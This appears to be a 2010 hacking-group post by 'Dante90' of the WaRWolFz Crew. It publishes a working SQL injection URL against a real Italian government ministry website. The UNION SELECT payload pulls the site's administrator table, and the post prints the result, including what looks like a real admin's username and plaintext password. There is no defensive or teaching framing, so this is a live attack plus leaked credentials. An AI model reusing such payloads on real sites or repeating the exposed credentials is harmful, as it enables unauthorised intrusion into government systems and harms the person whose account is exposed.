######################################################################################
# Author/s: Dante90, WaRWolFz Crew                                                   #
# Target: http://www.sviluppoeconomico.gov.it/                                       #
# Web: www.warwolfz.org                                                              #
# Vulnerability: SQL Injection                                                       #
######################################################################################

[code]
http://www.sviluppoeconomico.gov.it/organigramma/dossier.php?id_dossier=117&sezione=organigramma&tema_dir=tema2&gruppo=-1 UNION SELECT CONCAT_WS(CHAR(32,58,32),i_id,b_primopiano,t_user,t_password,t_nome,t_cognome,t_email,t_telefono,i_id_nodo,b_attivo,b_home,b_ministro,b_comunicati,b_persona,b_newsletter_ecom,b_nodo,b_presentazione,b_servizi,b_categorie,b_vertenze,b_viceministro,b_pubblicazioni,isOnlyViceministroGroup,b_Dipartimenti) FROM amministratori--
[/code]

[code]
111 : 0 : pblasi : pbl29OtToBrE209asi : pblasi : pblasi : [email protected] : : 0 : 1 : 0 : 0 : 0 : 0 : 0 : 1 : 0 : 0 : 0 : 0 : 0 : 0 : 0 : 0
[/code]

Dante90


#WaRWolFz 2010.05.12